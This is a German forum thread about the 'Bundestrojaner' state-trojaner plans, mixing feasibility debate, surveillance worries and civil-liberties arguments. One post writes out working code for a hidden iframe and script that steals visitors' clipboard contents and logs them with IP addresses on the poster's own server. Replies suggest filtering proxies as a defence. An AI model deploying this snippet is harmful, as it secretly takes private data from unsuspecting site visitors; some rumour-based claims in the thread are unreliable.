• Diese Seite verwendet Cookies. Indem du diese Website weiterhin nutzt, erklärst du dich mit der Verwendung von Cookies einverstanden. Erfahre mehr

Bundestrojaner

RobJ

Well-Known Member
Themenstarter #1
Hallo,

vielleicht interessiert das hier jemanden, der nicht bei Heise mitliest.
Ich kann einfach nicht glauben, was in diesem Land abläuft:

http://www.heise.de/newsticker/meldung/83538

Ich hoffe mal, daß das BVG eine eindeutige Ablehnung dazu formuliert. Die Politiker scheinen sich gedanklich komplett jenseits des geltenden Rechts aufzuhalten.

Grüße
RobJ
 

Gecko

{-nur_ein_unic's_fan-}
#2
Hallo,

vielleicht interessiert das hier jemanden, der nicht bei Heise mitliest.
Ich kann einfach nicht glauben, was in diesem Land abläuft:

http://www.heise.de/newsticker/meldung/83538

Ich hoffe mal, daß das BVG eine eindeutige Ablehnung dazu formuliert. Die Politiker scheinen sich gedanklich komplett jenseits des geltenden Rechts aufzuhalten.

Grüße
RobJ
Hallo Rob,

nicht nur dem Schein nach sondern ganz aktiv, schaue mal im Internet nach dem Namen Twister hierbei handelt es sich um eine Journalistin aus NRW, die Verfassungsklage eingereicht hat..

Hier im Forum gibt es auch einen Thread hierzu...

ich schaue mal nach und lege Dir dann die notwendigen Links.

mfg Gecko

-> nachgreicht:

so Rob wie versprochen noch nachgereicht der Link und weitere Infos zu Twister

http://www.twister-schreibt.de/mambo/

hier kann mann/frau die aktive Menschenrechtlerin unterstützen
 
Zuletzt bearbeitet:

Kamikaze

Warrior of Sunlight
#3
Ich zweifle immer noch an der Machbarkeit. Selbst an der Standard Windows Firewall sollte so etwas nicht vorbeikommen. Und es kann wohl auch niemand verbieten das Ding in Virensignaturen mit aufzunehmen. Ohne Botnetz scheint mir so etwas kaum erfolgversprechend und das kann wohl kaum von der Regierung gerechtfertigt werden.
Gezieltes Einschleusen scheint mir auch recht unzuverlässig.
 

Gecko

{-nur_ein_unic's_fan-}
#4
Ich zweifle immer noch an der Machbarkeit. Selbst an der Standard Windows Firewall sollte so etwas nicht vorbeikommen. Und es kann wohl auch niemand verbieten das Ding in Virensignaturen mit aufzunehmen. Ohne Botnetz scheint mir so etwas kaum erfolgversprechend und das kann wohl kaum von der Regierung gerechtfertigt werden.
Gezieltes Einschleusen scheint mir auch recht unzuverlässig.
Hallo Lon,

denke das ist zur Zeit wohl dass grösste Rätselraten in der Sicherheitsszene wie der sog... Bundestrojaner funktionieren sollte...

Gerüchte tauchen auf und die verdichten sich zu Spyware siehe Heisse Beitrag andere gehen in die Wurmrichtung..

Denke wer das herausbekommt der hat wohl nen 6er im Lotto, was allerdings bekannt wurde, sind das der Geheimdienst erfolgreich schon solche Angriffe durchgeführt hat..

So was nun Deine Bemerkung über Virensignaturen angeht so verweisse ich auf jüngste Veröffentlichungen von Kaspersky zum Thema Signaturen..

Sinngemäß ist hier soviel herauszulesen das die renomierten Anbieter von Antivirensoftware noch nicht annähernd genug auf die neue Malware Generation vorbereitet sind..

Merkmale dieser Schadensprogramme ist folgendes das diese Hyjacking und Viren sowie Trojanerfunktionalität beinhalten, also grob vereinfacht ausgedrückt eine Kombination sind..

So konnte die Firma BitDefender erst mit 14 tägiger Verspätung auf einen Virus reagieren der schon in the wild war...

Informationen hierzu findest Du unter Kasperkys News oder auch hier:

http://www.network-secure.de/index.php?option=com_frontpage&Itemid=1


Dann kommt noch erschwerend hinzu das viele bekannte Sicherheitslöcher immer noch nicht geschlossen sind:

1.) WMF Bug bei Grafiken
2.) Word Dokumte Bug bis Dato noch kein Patch erhältlich Rechner kann weiter übernommen werden
3.) Auch unter Linux zahlreiche Bugs siehe hierzu ProLinux Aufstellung der Fehler
4.) Auch unter den BSD wurden der Bug in der Firewire Schnittstelle noch nicht beseitigt..
5.) Auch unter Mac tauchen immer mehr Lecks auf siehe hierzu MOAB

Das sind nur grob gefasst ein paar Punkte..

So dann bekannt ist, das dieser sog.. Trojaner auf jeder Plattform lauffähig ist, desweiteren wurde bekannt das es sich hierbei auch um eine Zusammenarbeit mit französsichen Geheimdiensten handeln soll..

So hat der französische Geheimdienst im Frühjahr letzten Jahres mehrere solcher Aktionen erfolgreich auf allen Betriebssystemplattformen durchgeführt..

Also die Szene rätselt wie das wohl gehen dürfte ???

Bekannt wurde auch das neuerdings Flash ein hohes Interesse beim PhishPharming bekommt...

Auch hier sind wir erst am Anfang der Entwicklung...

Gruss Gecko
 

j_t

Alter Hase
#6
Natuerlich werden Geheimdienst werden gerne masslos ueberschaetzt. Wie bei allen staatlichen Massnahmen werden mal wieder, wenn ueberhaupt, nur die "Dummen" erwischt und leiden durfen pauschal alle. Solch unfreiheitlichen Bedingungen haette ich vor einigen Jahren hier in D glatt fuer unmoeglich gehalten.
Armes Deutschland.
 

Gecko

{-nur_ein_unic's_fan-}
#7
... wo sind die Links die deine Behauptungen bestätigen?

p.s: ich persöhnlich glaub nicht an die magic geheimdienste...
Hallo Shekcom,

also mir wurde von einem User hier im Forum unterstellt das ich mein "ich zitiere wörtlich Halbwissen gerne mit Links generiere"

Deshalb habe ich diesesmal bewusst auf Links verzichtet:

zum :PhishPharming: folgender Link:

http://www.network-secure.de/index.php?option=com_frontpage&Itemid=1

meine hier gemachten Aussagen kannst Du unter anderen auch bei Golem.de nachlesen...

die Abkürzung MOAB bezieht sich auf den zur Zeit stattfindenden Month of Apple Bugs dazu folgender Link

http://www.macwelt.de/news/macosx/342717/index.html

Denke das reicht vorerst, aber falls gewünscht reiche ich die üblichen noch nach..

Gruss Gecko
 

ShekconTrebb

Well-Known Member
#8
??? ähm
Das Beweist nicht das "mysterie" Geheimdienst lauter freaks hat die jede Büchse dieser Welt hacken kann.

Sollen die Kollegen vom BND oder was auch immer ihre Trojaner basteln. Ich bin mir relativ sicher das es diese ganze Sache wieder "normalo" User erwischt der sich durch Norton und Co in Sicherheit gewiegt fühlt.

J
 

Gecko

{-nur_ein_unic's_fan-}
#9
??? ähm
Das Beweist nicht das "mysterie" Geheimdienst lauter freaks hat die jede Büchse dieser Welt hacken kann.

Sollen die Kollegen vom BND oder was auch immer ihre Trojaner basteln. Ich bin mir relativ sicher das es diese ganze Sache wieder "normalo" User erwischt der sich durch Norton und Co in Sicherheit gewiegt fühlt.

J
Hallo Shekcom,

also wie gesagt viele Gerüchte !

Meine Einschätzung geht eher dahin:

http://www.bsdforen.de/showthread.php?p=147060#post147060


gruss Gecko
 

ShekconTrebb

Well-Known Member
#10
mh!
Ohne dir jetzt nahe Tretten zu wollen.(ok schon vorbei).

Ich hab werd irgendwie das gefühl nicht los das "Verschwörungs-Theorien" momentan der Renner sind.

Ok sollen alle doch die Daten sammeln. Ich will die Maschinen sehen die diese Daten dann verarbeiten und dann noch "Zeitnah" Ergebnisse geben.

einen 1024bit Schlüssel knacken ist schonmal recht Anspruchsvoll. (Zeit, bin grad zu faul um einen Link zu geben auf dem eine Beispiel Rechnung ist wie lange dies dauern würde).

Dann noch das auf Richtige unter Massig Traffic rausfiltern. ^^ Naja ich weis ja nicht. Ich bin wie gesagt gespannt wie die Kollegen Verschlüsselte Daten Knacken.

Gehen wir mal davon aus das "Otto-Normal" User Internet nutzt. Ich glaub kaum das es von interesse ist ob und wenn ja wieviel "Karl-Heinz 0815" Internet benutzt und was dieser Jemand dann da macht. Erstmal das Richtige finden. Wenn jetzt noch nur jeder 100er User Verschlüsselungs-Technologien einsetzt.
Dann Viel viel spaß.
Klar kann man schön mit nem Tap-Device Link
Den Verkehr abhören .. also auch du daheim wenn du son ding dazwischen setzt.
Ok ne Transparente Firewall bzw Bridge(mir fällt grad die Richtige bezeichnung nicht ein (es ist spät und das Bier wirkt auserdem hab ich halsschmerzen(intressiert eh kein))) würde das selbe erledigen.

Dann hast du das und dann? Brauchste noch das Richtige um mit zu loggen und Verkehr dannach auch noch auszuwerten.

Bringt dir aber nichts wenn jemand wirklich verschleiern will was er tut. Und jemand der dies will bekommt es auch hin.

... Ich geh in Bett.

(Schreibfehler tun mir Leid und euch Weh. Es ist zu Spät und mein "Rechtschreib"-Programm hat den Bundestrojaner der uns allen nur weis machen will das die Pisa-Studie wahr ist!)
 

Gecko

{-nur_ein_unic's_fan-}
#11
mh!
Ohne dir jetzt nahe Tretten zu wollen.(ok schon vorbei).

Ich hab werd irgendwie das gefühl nicht los das "Verschwörungs-Theorien" momentan der Renner sind.

Ok sollen alle doch die Daten sammeln. Ich will die Maschinen sehen die diese Daten dann verarbeiten und dann noch "Zeitnah" Ergebnisse geben.

einen 1024bit Schlüssel knacken ist schonmal recht Anspruchsvoll. (Zeit, bin grad zu faul um einen Link zu geben auf dem eine Beispiel Rechnung ist wie lange dies dauern würde).

Dann noch das auf Richtige unter Massig Traffic rausfiltern. ^^ Naja ich weis ja nicht. Ich bin wie gesagt gespannt wie die Kollegen Verschlüsselte Daten Knacken.

Gehen wir mal davon aus das "Otto-Normal" User Internet nutzt. Ich glaub kaum das es von interesse ist ob und wenn ja wieviel "Karl-Heinz 0815" Internet benutzt und was dieser Jemand dann da macht. Erstmal das Richtige finden. Wenn jetzt noch nur jeder 100er User Verschlüsselungs-Technologien einsetzt.
Dann Viel viel spaß.
Klar kann man schön mit nem Tap-Device Link
Den Verkehr abhören .. also auch du daheim wenn du son ding dazwischen setzt.
Ok ne Transparente Firewall bzw Bridge(mir fällt grad die Richtige bezeichnung nicht ein (es ist spät und das Bier wirkt auserdem hab ich halsschmerzen(intressiert eh kein))) würde das selbe erledigen.

Dann hast du das und dann? Brauchste noch das Richtige um mit zu loggen und Verkehr dannach auch noch auszuwerten.

Bringt dir aber nichts wenn jemand wirklich verschleiern will was er tut. Und jemand der dies will bekommt es auch hin.

... Ich geh in Bett.

(Schreibfehler tun mir Leid und euch Weh. Es ist zu Spät und mein "Rechtschreib"-Programm hat den Bundestrojaner der uns allen nur weis machen will das die Pisa-Studie wahr ist!)
Hallo Shekcon,

erstmal gute Besserung für Deinen Hals, (Tipp was warmes trinken)

interesant in diesem Zusammenhang ist oder vielmehr war die Aktion von Greanpeace, die bei Echolon stattfand...

also bei meiner Recherche die immer noch andauert, war ich erstaunt über das technische Equipment das hier in diesem Marktsektor eingesetzt wird...

damit wird richtig viel Geld gemacht und die Möglichkeiten spielen sich jenseits meiner Vorstellungskraft ab...

so nun aber zum Otto Normal User, schätze mal der wird zum überwiegenden Teil auf "Vista" umsteigen, wenn nicht jetzt dann zeit verzögert im laufe des nächsten Jahres bei Neuanschaffung etc...

dazu passt nun folgende Mitteilung:

http://magazine.web.de/de/themen/computer/software/aktuell/3461434,page=1.html


Microsoft hat dies immer heftigst dementiert schon bei Win 98 kam der Verdacht auf, konnte aber nie bewiesen werden, ging weiter mit 2000 Scientology die standardmässige Defragmentierungssoftware unter Win 2000...

So jetzt ist es raus Microsoft hat bei der Entwicklung von Vista mit dem NSA zusammengearbeitet oder anders -> Windows Vista - powered by NSA?

Microsoft musste das jetzt notgedrungen einräumen...

Wage mir gar nicht vorzustellen die Möglichkeiten die sich da nun auftun !

Desweiteren stand auch in Golem das ein Wissenschaftler eindringlich vor diesem
Os warnt...

http://www.golem.de/0612/49655.html

Gruss Gecko
 
Zuletzt bearbeitet:

Kamikaze

Warrior of Sunlight
#12
So dann bekannt ist, das dieser sog.. Trojaner auf jeder Plattform lauffähig ist, desweiteren wurde bekannt das es sich hierbei auch um eine Zusammenarbeit mit französsichen Geheimdiensten handeln soll..

So hat der französische Geheimdienst im Frühjahr letzten Jahres mehrere solcher Aktionen erfolgreich auf allen Betriebssystemplattformen durchgeführt..

Also die Szene rätselt wie das wohl gehen dürfte ???

Bekannt wurde auch das neuerdings Flash ein hohes Interesse beim PhishPharming bekommt...
Die Scene sollte aufhören zu rätseln. Es geht einfach nicht. Das ganze ist offensichtlich Propaganda unter das Volk gestreut.

Alle Betriebssystemplattformen heißt wahrscheinlich alle Windows Versionen, MacOS und Suse Linux. Und ein Trojaner der auf all diesen Plattformen seinen Dienst verrichtet scheint mir doch recht unwahrscheinlich.
 

Gecko

{-nur_ein_unic's_fan-}
#14
#15
Unter Windows gibts den aber auch schon seit Jahren, als Webbug bekannt:

Du fügst auf einer Seite, auf der du Schreibrechte hast (z.b dein MySpace Account) folgende Zeile hinzu:

<iframe width="2" height="2"
src="http://www.mein-eigener-server-hier/böse.html"></iframe>

Dann erstellst du auf deinem Webserver eine böse.html mit diesem Inhalt:

Code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HEAD></HEAD>
<BODY text=#ffffff vLink=#ffffff aLink=#ffffff link=#ffffff bgColor=#000000
topMargin=8 >


<script type="text/javascript">

a = window.clipboardData.getData('Text');

 [B]dummy = new Image();[/B]
 dummy.src='böse2.php?a=' + a ;

</script>


</FONT></BODY></HTML>
und eine böse2.php mit diesem Inhalt:
Code:
<head>
</head>
<body>
<?php
  echo $_GET['a'];

	$ip = $_SERVER['REMOTE_ADDR'];
	$referer = $_SERVER['HTTP_REFERER'];
	$prog = $_SERVER['HTTP_USER_AGENT'];
	$host = gethostbyaddr($ip);
	$date = date('d.m.Y');
	$time = date('H:i:s');
	$fp = fopen('info.txt', 'a+');
	fputs($fp, $a.' - '.$date.' - '.$time.' - '.$ip.' - '.$host.' - '.$prog.' - '.$referer.' - '.$user."\n");
	fclose($fp); 

?>
</body>
Und schon hast du mit der Zeit eine tolle info.txt auf deinem Server liegen , die dir die interessanten Zwischenablageninhalte der Besucher deines MySpace Accounts zeigt.
(Leider nur von den Internet Explorer Usern, aber das sind (und das weis ich aus eigener Erfahrung;) )immernoch recht viele.
 

Gecko

{-nur_ein_unic's_fan-}
#16
Unter Windows gibts den aber auch schon seit Jahren, als Webbug bekannt:

Du fügst auf einer Seite, auf der du Schreibrechte hast (z.b dein MySpace Account) folgende Zeile hinzu:......
(Leider nur von den Internet Explorer Usern, aber das sind (und das weis ich aus eigener Erfahrung;) )immernoch recht viele.
Jo das geht, was aber auch geht ist es mit mp3 oder video_files zu arbeiten, denke mal viele setzen VLC ein.. Naja der läuft ja bekanntermaßen auf vielen Plattformen habe den zum Beispiel unter BeOS 5.0 Developer Edition verwendet...

Generell kann mann/frau sagen das es sehr einfach ist "Schadecode bzw.. Befehle die Aktionen auslösen " in Bildern unterzubringen..

Dann noch ne Möglichkeit wäre ICQ wird ja auch schon so gehandelt und und und..

Gruss Gecko

->noch nachgereicht:

Sorry Nevix und alle Mitleser :(

hoffe Du/Ihr lest das dann noch.

Also ganz vergessen eine Möglichkeit sich gegen solche Inline Frames oder Skripte zu schützen wäre der Einsatz eines Webfilter basierten Proxies...

Da gibt es zum einen Proxomitron für alle Microsoft basierten OS

http://www.buerschgens.de/Prox/

In der Unix Welt gibt es Privoxy das läuft auf allen Unix*en und steht unter GPL

http://www.privoxy.org/

Allerdings Sicherheit hat auch ihren Preis, Webseiten mit viel aktiven Inhalt wären nur bedingt ausführbar zum Beispiel auch unsere Foren Seite...

Der Grund durch die eigene Filtersprache beider Programme kann mann/frau bis aufs kleinste einstellen welche Aktionen/inhalte/abfragen/skripte/bilder/flash usw.. usf.. ausgeführt und welche unterbunden werden..

Falls hier im Forum daran Interesse hat so rate ich demjenigen/jenige mal auf die Homepage von Proxomitron zu gehen und sich die hervorragende Anleitung durchzulesen..

Auch die Einführung in die Filtersprache ist sehr sehr spannend, überhaupt eine sehr wichtige Ergänzung zum / für das eigene Sicherheitskonzept ...
 
Zuletzt bearbeitet:
#17
Hab' eben mal auf dieser Proxomitron-Seite gelesen und war doch erstaunt, was für ein Sicherheitsrisiko Cookies Darstellen.
Dass ein Seitenbetreiber seine Nutzer wiedererkennen und ein Besuchsprofil erstellen kann, war mir klar.
Aber an Firmen wie Doubleclick, die Massen an Besucherdaten verschiedenster Werbepartner auswerten können, habe ich gar nicht gedacht -_-
 

fader

Klaatu Verrata Nectu
#18
Ihr geht das gedanklich falsch an. Ihr denkt zu sehr als ITler. Wenn die Methode das Problem nicht vollstaendig loest, ist sie schlecht.

Der Kriminologe denkt anders. Der laesst z.B. auch Fingerabdruecke nehmen. Und das, obwohl sich der Taeter nur ein paar popelige Handschuhe anziehen muss, um das zu unterlaufen. 99 Taeter sind klever. Einer macht da einen Fehler. Wie wird sich Komplexitaet "Handschuhe anziehen" zu Komplexitaet "Betriebssystem absichern" wohl verhalten?

Ihr habt eine BSD Firewall und alles top secure? Tjo, hats halt nicht geklappt. Dann seid ihr eben der eine, der Handschuhe getragen hat. Selbst wenns nur bei einem von 1000 funktionieren wuerde, ist das ein messbarer Erfolg. Bei vielen Ermittlungsmethoden ist die Effektivitaet viel geringer.

Die wollen ja nur in ihrem "Werkzeugkoefferchen" _ein_ neues Spielzeug haben. Eins unter tausenden. Ermittlungsarbeit bedeutet systematische Suche. Eine grosse Checkliste und die wird runtergerasselt. Da ist ein Punkt "[ ] Probieren, ob man Zugang zum Rechner bekommen kann". Wenns nicht klappt, wird der abgehakt und zum naechsten uebergegangen.

Was die wollen ist ja nicht eine Garantie, dass das immer oder wenigstens ueberwiegend zum Erfolg fuehrt. Was die wollen ist, dass sie sich nicht selbst strafbar machen, wenn sie es versuchen. Um nichts anderes geht es.

Der Grund fuer die Verwirrung mag auch darin zu suchen sein, dass wir es bisher mit Methoden zu tun hatten, bei denen zumindest erstmal ueberhaupt _irgendein_ Erfolg zu verzeichnen war. Wenn ich z.B. eine Wohnung abhoere, dann sind da zunaechst erstmal wenigstens _irgendwelche_ Gespraeche zu hoeren. Oder wenn ich den Internettraffic aufzeiche, dann fallen da _irgendwelche_ Daten an. Aus dem Blickwinkel des Datenschuetzers ist bereits das ein (zu bekaempfender) Erfolg, weil hierdurch bereits die Privatsphaere verletzt wird. Fuer den Ermittler gibt es aber keinen Unterschied zwischen einigen Terrabyte Daten, welche ihn nicht weiterbringen und einem gescheiterten Versuch, Zugang zu einer Festplatte zu bekommen. In beiden Faellen hat er, aus seinem Blickwinkel, nichts.

Insofern ist das "Problem" der zu erwartenden haeufigen Erfolglosigkeit bei diesen "Onlinedurchsuchungen" fuer den Ermittler keins.

Nachtrag: weil mir grad noch ein aktuelles Beispiel fuer diese Denkweise einfaellt: Falls Terroristen ein Flugzeug kapiern wuerden und dann versuchen wuerden, dieses Flugzeug in ein Objekt auf deutschem Boden zu lenken, dann koennte, wenn man rechtzeitig davon erfahren wuerde, man die technischen Moeglichkeiten dazu haette und man das Flugzeug noch vorher erwischen wuerde, der Abschuss ebendieses Flugzeuges befohlen werden. So in der Art ist die Problemstellung des Luftsicherheitsgesetzes, mit dem sich lauter schlaue, hoch bezahlte Leute beschaeftigen. Wie hoch wird die Wahrscheinlichkeit wohl sein, dass alle diese "Wenn" und "Aber" irgendwann mal eintreten? Juckt nicht. Es geht ums Prinzip. Und bei der Rechnerknackerei ist das genau so. Wenn man irgendwann mal einen Verdaechtigen haette der ein offenes System haben wuerde und man haette eine Moeglichkeit ... dann duerfte man.
 
Zuletzt bearbeitet:
#19
Ihr geht das gedanklich falsch an. Ihr denkt zu sehr als ITler. Wenn die Methode das Problem nicht vollstaendig loest, ist sie schlecht.



Was die wollen ist ja nicht eine Garantie, dass das immer oder wenigstens ueberwiegend zum Erfolg fuehrt. Was die wollen ist, dass sie sich nicht selbst strafbar machen, wenn sie es versuchen. Um nichts anderes geht es.



_irgendwelche_ Daten an. Aus dem Blickwinkel des Datenschuetzers ist bereits das ein (zu bekaempfender) Erfolg, weil hierdurch bereits die Privatsphaere verletzt wird. Fuer den Ermittler gibt es aber keinen Unterschied zwischen einigen Terrabyte Daten, welche ihn nicht weiterbringen und einem gescheiterten Versuch, Zugang zu einer Festplatte zu bekommen. In beiden Faellen hat er, aus seinem Blickwinkel, nichts.


Insofern ist das "Problem" der zu erwartenden haeufigen Erfolglosigkeit bei diesen "Onlinedurchsuchungen" fuer den Ermittler keins.


So in der Art ist die Problemstellung des Luftsicherheitsgesetzes, mit dem sich lauter schlaue, hoch bezahlte Leute beschaeftigen. Wie hoch wird die Wahrscheinlichkeit wohl sein, dass alle diese "Wenn" und "Aber" irgendwann mal eintreten? Juckt nicht. Es geht ums Prinzip. Und bei der Rechnerknackerei ist das genau so. Wenn man irgendwann mal einen Verdaechtigen haette der ein offenes System haben wuerde und man haette eine Moeglichkeit ... dann duerfte man.
Die technische Möglichkeiten der Durchführung und der mögliche Erfolg der ganzen Massnahme jetzt mal außen vor gelassen, denn darum geht es nur nebenbei, es geht wie du es geschrieben hast ums Prinzip, das Prinzip der Rechtstaatlichkeit. Und genau an der dieser Stelle überschreitet der deutsche Staat die Grenze. Als erstes nimmt er alle Bürger unter den Generalverdacht kriminell zu sein (werden zu können), siehe Vorratsdatenspeicherung. Dann verletzt er die Privatsphäre der Bürger, in dem er sogar Geheimdiensten die Möglichkeit der Überwachung anders denkender Bürger einräumt. Wohlgemerkt geht es schon lange nicht mehr um Terrorismus. Stell dir mal vor, deine Wohnung würde in Abwesenheit durchsucht werden, mit einem Nachschlüssel und keiner würde dich über eventuell mitgenommene Gegenstände informieren. Deinen Aufschrei möchte ich dann mal hören. Der unbedingte Drang Schäubles Flugzeuge auf den blossen Verdacht hin abschiessen zu dürfen, schlägt dem Fass den Boden aus. Ein Staat masst sich an prophylaktisch andere Menschen zu töten!!!

Es geht nicht um die Wahrscheinlichkeit dass all dies mal durchgeführt wird, zumindest in Sachen Luftsicherheitsgesetz sind sich die Experten einig, dass die notwendige Zeit wohl zu kurz wäre um eine Entscheidung zu fällen. Aber die freiheitlich demokratische Grundordnung, eine der Lehren des Dritten Reiches, wäre dahin. Es gäbe keine Freiheit mehr, sondern Angst, da passt auch ganz gut das Projekt der Online-Polizeiwache in NRW mit rein, die es Bürgern erleichtern soll in (anonymen) Kontakt mit der Polizei zu treten. Es lebe die Denunziation!
Dieses extreme Sicherheitsdenken aus Kreisen unserer Regierung führt eindeutig zur Einschränkung persönlicher Freiheit. Es soll das Paradoxon geschaffen werden, Freiheit unter Aufgabe der Freiheit zu schaffen.


Ganz nebenbei verstoßen Vorratsdatenspeicherung und Onlinedurchsungen gegen geltendes Recht. Aber notfalls werde man die Gesetze anpassen um seine paranoiden Vorstellungen zu "legitimieren". Sigi Freud hätte seine helle Freude an solche Leuten gehabt.

Ich persönlich habe schon einen solchen Staat erlebt der sich gnadenlos in die Privatsphäre seiner Bürger gedrängt hat, noch einen will ich nicht erleben.


Setro
 

fader

Klaatu Verrata Nectu
#23
Ich persönlich habe schon einen solchen Staat erlebt der sich gnadenlos in die Privatsphäre seiner Bürger gedrängt hat, noch einen will ich nicht erleben.
Leider sind wir gerade auf dem allerbesten Wege in so eine Ueberwachungsgesellschaft. Dagegen ist die Stasi eine Kaspertruppe gewesen. Der wesentliche Unterschied ist eben, dass alles schon (noch) irgendwo im Grunde demokratisch und nach rechtstaatlichen Prinzipien ablaeuft. Wenn man nicht gerade ein Moslem ist und den Haeschern amerikanischer Geheimdienste in die Haende faellt, muss man noch nicht fuerchten, fuer einen politischen Witz oder eine unbedachte Aeusserung bei Nacht und Nebel verschleppt und in ein dunkles Loch geworfen zu werden. Da werden vorerst eher so kleinere Dinge anfallen. Uebereifrige Staatsanwaelte. Korrupte Polizisten die mal fix den neuen Lebenspartner der Ex durch die Datenbank jagen ... sind ja alles Dinge, die heute schon vorkommen. Nur eben mit immer mehr Daten. Wirklich Sorgen muss man sich eben bei so rechten Aktionen wie dem "Killerspieleverbot" machen, wo ganze Altersgruppen gleich mal per Gesetz zu Kriminellen gestempelt werden sollen. Da sind wir naemlich schon fast wieder soweit, dass man vorgeschrieben bekommt, was man zu denken hat. Und wenn dann zur Ueberwachung dieser Abweichler der besagte Apparat zum Einsatz kommt, spaetestens dann sollte man hier weg sein. Eins ist mir jetzt schon klar geworden. Freiheit hat fuer die Mehrheit der Deutschen keinerlei Wert.
 
#24
Leider sind wir gerade auf dem allerbesten Wege in so eine Ueberwachungsgesellschaft. Dagegen ist die Stasi eine Kaspertruppe gewesen.
Auf dem Weg oder schon angekommen, darüber lässt sich köstlich streiten. Fakt ist, das Gesetz zur Online-Durchsuchung in NRW ist beschlossen, andere Bundesländer wollen so schnell wie möglich folgen. Damit ist eine Tatsache geschaffen und kein mögliches Szenario entworfen worden. Wenn der Staat heute die technische Möglichkeit hätte, er würde schon heute davon Gebrauch machen, den "rechtlichen Rahmen" hat er sich, vorerst, gegeben. Das die Stasi eine Kaspertruppe war, bestreite ich vehement. Nur weil die technischen Möglichkeiten des MfS damals ganz andere waren, waren sie nicht annähernd so harmlos. In meinem Fall saß der Spitzel mit an meinem Tisch, wenn du verstehst was ich ausdrücken will.


Der wesentliche Unterschied ist eben, dass alles schon (noch) irgendwo im Grunde demokratisch und nach rechtstaatlichen Prinzipien ablaeuft. [/QOUTE]


Irgendwie klingt das mit dem in Klammern gefassten 'noch' wie das Pfeiffen im Walde. Wenn es im Grunde, also grundhaft, rechtstaatlich wäre, dann hätten wir die jetzige Situation nicht. Am 25.11.06 hat ein Ermittlungsrichter des BGH Online-Durchsuchungen für unrechtsmäßig erklärt.

http://www.heise.de/newsticker/meldung/82341

Und dennoch beschließt der Landtag eines Bundeslandes ein solches Gesetz. Was hier ran ist bitte rechtstaatlich, das du gerne dagegen klagen darfst, aber in der Zwischenzeit, sind ja nur 3-4 Jahre, fleißig überwachst wird? Kommentare von Sachverständigen zum VSG-NRW fiindest du hier.

http://www.landtag.nrw.de/portal/WWW/dokumentenarchiv/Dokument?Id=MMD14/3045

In dem du online gehst mit deinem Rechner, würdest du aus deiner Privatsphäre heraustreten und damit nicht mehr unter der Schutzwürdigkeit der Unversehrtheit der eigenen Wohnung stehen (Art. 13 GG). Wenn es nicht so traurig wäre, könnte ich mich kringeln vor lachen.

Siehe auch hier.

http://www.heise.de/newsticker/foren/go.shtml?read=1&msg_id=11961077&forum_id=110804

Wenn man nicht gerade ein Moslem ist und den Haeschern amerikanischer Geheimdienste in die Haende faellt, muss man noch nicht fuerchten, fuer einen politischen Witz oder eine unbedachte Aeusserung bei Nacht und Nebel verschleppt und in ein dunkles Loch geworfen zu werden.{/QUOTE]

Gab es da nicht den Fall des Deutsch-Syrers, der vom amerikanischen Geheimdienst verschleppt und aufgrund einer Namensverwechslung festgehalten und nach eigenen Angaben auch gefoltert wurde, mit Wissen der Bundesregierung? Der hatte nicht mal nen Witz gerissen und kam ins finstere Loch. Eine Unterscheidung zwischen westlich geprägten und muslimischen Bürgern mache ich nicht. Für den Rest lege ich meine Hände nicht ins Feuer, nicht für dieses Land.

{QUOTE]
Da werden vorerst eher so kleinere Dinge anfallen. Uebereifrige Staatsanwaelte. Korrupte Polizisten die mal fix den neuen Lebenspartner der Ex durch die Datenbank jagen ... sind ja alles Dinge, die heute schon vorkommen. Nur eben mit immer mehr Daten.{/QUOTE]

Diese Datenbank muss erst mal gefüttert werden, und der Stoff aus dem diese Datenbank ist, liegt vielleicht auch auf deinem Rechner. Noch ist unser Rechtssystem In Deutschland nicht so verkommen wie in den USA, aber unsere Verhältnisse gleichen sich ja immer mehr an, dafür sorgen schon Merkel und co. Hier mal ein schöner Link zu dem Thema USA und Rechtstaatlichkeit.[/QOUTE]

http://www.nachdenkseiten.de/?p=1967

Wirklich Sorgen muss man sich eben bei so rechten Aktionen wie dem "Killerspieleverbot" machen, wo ganze Altersgruppen gleich mal per Gesetz zu Kriminellen gestempelt werden sollen. Da sind wir naemlich schon fast wieder soweit, dass man vorgeschrieben bekommt, was man zu denken hat. Und wenn dann zur Ueberwachung dieser Abweichler der besagte Apparat zum Einsatz kommt, spaetestens dann sollte man hier weg sein. Eins ist mir jetzt schon klar geworden. Freiheit hat fuer die Mehrheit der Deutschen keinerlei Wert.

Mit dem Killerspielverbot habe ich persönlich das geringste Problem, meine Rechner sind reine Produktivsysteme, und eine Spielekonsole habe ich nicht. Aber ein potentieller Krimineller bin ich für meine Regierung schon jetzt, denn nur deswegen hat sie die verschärfte Vorratsdatenspeicherung erlassen. Damit sammelt sie jetzt Daten um sie später, wenn ich mal kriminell geworden bin, gegen mich zu verwenden. Jedesmal wenn mir dies wieder bewusst wird, überfällt mich so eine merkwürdige Wut und Ohnmacht.

Der Apparat zur Überwachung, dafür gibt es einen interssanten Ansatzpunkt.
Es beginnt im letzten Jahr.

http://www.heise.de/newsticker/meldung/80021


Und hier die These.

http://www.heise.de/newsticker/foren/go.shtml?read=1&msg_id=11961902&forum_id=110804

Sollte sich dies so bestätigen, dann gute Nacht. Da hilft kein PF und kein mOnOwall mehr.

Zur Zusammenarbeit der deutschen und amerikanischen Ermittlungsorgane siehe hier.

http://www.dradio.de/dlf/sendungen/computer/580328/

Zu den Sicherheitsgelüsten des Herrn Schäuble auch hier was.

http://www.sueddeutsche.de/,tt1l2/deutschland/artikel/855/96759/


Was uns Deutsche unsere Freiheit Wert ist, müssen wir ganz schnell klar stellen. Mit einem Fuss haben wir den demokratischen Boden schon verlassen, daran ändert auch die Tatsache nichts, dass wir ja alle 4 Jahre wählen dürfen. Innerhalb dieser 4 Jahre fehlt uns jedwede Möglichkeit der Einflussnahme. Und es ist egal welche der großen Parteien in Deutschland dran ist, alle blasen sie ins selbe Horn. In NRW CDU/FDP, bundesweit CDU/CSU/SPD, da kannst du höchsten wählen, von was dir schneller schlecht wird.

Ich habe da noch einen schönen Kommentar passend zum Thema.

http://egon-w-kreutzer.de/Meinung/0PAD2.html


Genug geschrieben, soll ja kein Roman werden.


PS: Lieben Dank für die Willkommensgrüsse :)
 

ShekconTrebb

Well-Known Member
#25
Nochmal das ganze Thema ist doch nicht irgendwie "magic" sondern es gibt. Für alles Erklärungen.

Was ich sagen will ist Glaubt ihr allen Ernstes das die Jungs vom Geheimdienst irgendwie Spezial TCP/IP-Voodoo machen?

Wenn mans nicht will und sich schützen möchte wird dies auch gehen.

DAS wirkliche Problem ist die ganze Story um unser Rechtsystem drumrum.
